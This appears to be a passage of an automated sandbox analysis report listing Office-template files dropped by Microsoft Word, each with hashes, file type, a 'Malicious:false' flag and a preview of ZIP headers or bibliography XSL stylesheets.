                                                      Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                      SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                      SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                      SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                      SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                      SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                      SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                      SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                      SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                      SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:5632C4A81D2193986ACD29EADF1A2177
                                                      SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                      SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                      SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                      SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                      SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                      SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:51D32EE5BC7AB811041F799652D26E04
                                                      SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                      SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                      SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:9888A214D362470A6189DEFF775BE139
                                                      SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                      SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                      SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:F425D8C274A8571B625EE66A8CE60287
                                                      SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                      SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                      SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:33A829B4893044E1851725F4DAF20271
                                                      SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                      SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                      SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                      SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                      SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                      SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                      SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                      SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                      SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                      SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                      SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                      SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:377B3E355414466F3E3861BCE1844976
                                                      SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                      SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                      SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                      SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                      SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                      SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:F883B260A8D67082EA895C14BF56DD56
                                                      SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                      SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                      SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Word 2007+
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                      SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                      SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                      SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Word 2007+
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                      SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                      SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
